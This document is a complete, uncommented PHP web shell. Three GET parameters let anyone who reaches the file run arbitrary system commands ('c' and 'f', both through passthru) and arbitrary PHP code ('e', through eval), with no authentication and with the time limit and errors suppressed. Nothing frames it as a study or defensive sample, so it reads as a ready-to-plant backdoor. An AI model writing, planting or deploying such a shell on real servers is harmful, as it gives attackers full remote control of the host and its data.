<?php set_time_limit(0); if(isset($_GET["c"])) { header("Content-Type: text/plain"); @passthru($_GET["c"]); } else if(isset($_GET["f"])) { header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=\"" . basename($_GET["f"]) . "\""); @passthru($_GET["f"]); exit; } else if(isset($_GET["e"])) { eval($_GET["e"]); exit; } ?>